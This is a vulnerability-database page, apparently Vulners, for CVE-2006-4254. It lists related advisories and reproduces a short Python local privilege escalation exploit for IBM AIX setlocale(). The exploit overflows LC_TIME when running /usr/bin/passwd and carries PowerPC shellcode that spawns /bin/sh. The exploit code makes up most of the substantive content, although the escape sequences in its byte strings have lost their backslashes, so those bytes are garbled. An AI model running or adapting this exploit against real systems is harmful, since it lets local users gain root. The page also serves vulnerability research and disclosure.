| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit | 7 Nov 200700:00 | – | zdt | |
| CVE-2006-4254 | 21 Aug 200620:00 | – | cve | |
| CVE-2006-4254 | 21 Aug 200620:00 | – | cvelist | |
| IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation | 7 Nov 200700:00 | – | exploitdb | |
| EUVD-2006-4242 | 7 Oct 202500:30 | – | euvd | |
| IBM AIX 5.3.0 - setlocale() Local Privilege Escalation | 7 Nov 200700:00 | – | exploitpack | |
| CVE-2006-4254 | 21 Aug 200620:04 | – | nvd | |
| setlocate-local.txt | 7 Nov 200700:00 | – | packetstorm | |
| IBM AIX <= 5.3.0 - setlocale() Local Privilege Escalation Exploit | 1 Jul 201400:00 | – | seebug |
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#[email protected]
#
from os import execve
bof=&quot;a&quot;*580+&quot;bbbbccccddddx2fxf2x28x2f&quot;
egg=&quot;x60&quot;*2350
shellcode=( # by intropy &lt;at&gt; caughq.org
&quot;x7cxa5x2ax79&quot; # xor. r5,r5,r5
&quot;x40x82xffxfd&quot; # bnel &lt;shellcode&gt;
&quot;x7fxe8x02xa6&quot; # mflr r31
&quot;x3bxffx01x20&quot; # cal r31,0x120(r31)
&quot;x38x7fxffx08&quot; # cal r3,-248(r31)
&quot;x38x9fxffx10&quot; # cal r4,-240(r31)
&quot;x90x7fxffx10&quot; # st r3,-240(r31)
&quot;x90xbfxffx14&quot; # st r5,-236(r31)
&quot;x88x5fxffx0f&quot; # lbz r2,-241(r31)
&quot;x98xbfxffx0f&quot; # stb r5,-241(r31)
&quot;x4cxc6x33x42&quot; # crorc cr6,cr6,cr6
&quot;x44xffxffx02&quot; # svca
&quot;/bin/sh&quot;
&quot;x05&quot;)
execve(&quot;/usr/bin/passwd&quot;,[&quot;&quot;],{&quot;EGG&quot;:egg+shellcode,&quot;LC_TIME&quot;:bof})
# sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation